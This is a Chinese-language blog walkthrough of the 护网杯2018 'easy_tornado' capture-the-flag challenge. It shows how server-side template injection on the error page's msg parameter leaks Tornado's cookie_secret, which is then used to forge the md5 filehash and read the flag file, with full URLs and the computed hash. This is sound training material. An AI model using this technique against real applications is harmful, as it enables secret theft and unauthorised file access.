护网杯2018-easy_tornado

 · 2020-1-29  ·次阅读


首先看题QQ截图20200129160301

里边的内容分别是

QQ截图20200129160448)QQ截图20200129160441)QQ截图20200129160434

我们可以直接得出flag所在的文件夹是/fllllllllllllag

分析这三个的url

http://de0ee060-7c62-4c47-9155-96c35ec001fe.node3.buuoj.cn/file?filename=/flag.txt&filehash=3af0858a46186b7d343f7dd9419e1525

http://de0ee060-7c62-4c47-9155-96c35ec001fe.node3.buuoj.cn/file?filename=/welcome.txt&filehash=f9793be52dec6c36581bb8429f8c1039

http://de0ee060-7c62-4c47-9155-96c35ec001fe.node3.buuoj.cn/file?filename=/hints.txt&filehash=e9155f0f3d25f1ad639771ca93cb5e5d

我们可以得出这样的结论,flag所在文件的url应该是http://de0ee060-7c62-4c47-9155-96c35ec001fe.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=**

至于这个**应该就是md5(cookie_secret+md5(filename))

filename我们已经知道是fllllllllllllag,那么我们接下来只需要找到cookie_secret

利用burp抓包我们并没有找到cookie,只能上百度了……(那咋办嘛)

通过百度得知在error页面存在SSTI模板注入(又是一个看不懂的东西……)

憨憨落泪

附上关于SSTI模板注入的博客:SSTI完全学习

注入方式大概就是error?msg=0

……??????至于注入啥玩意儿,大佬说的是用handler.settings对象(这又是啥玩意儿,咱也不知道,咱也不敢问)

那么传递error?msg=

http://de0ee060-7c62-4c47-9155-96c35ec001fe.node3.buuoj.cn/error?msg=

得到这个回显

QQ截图20200129162705

‘cookie_secret’: ‘66015e24-a274-4abf-bd65-6776ae208dc4’}

接下来构造

http://de0ee060-7c62-4c47-9155-96c35ec001fe.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=ee31ce84bedac7c8242d99b3047d4ad1

访问得到

QQ截图20200129163253

我太难了….1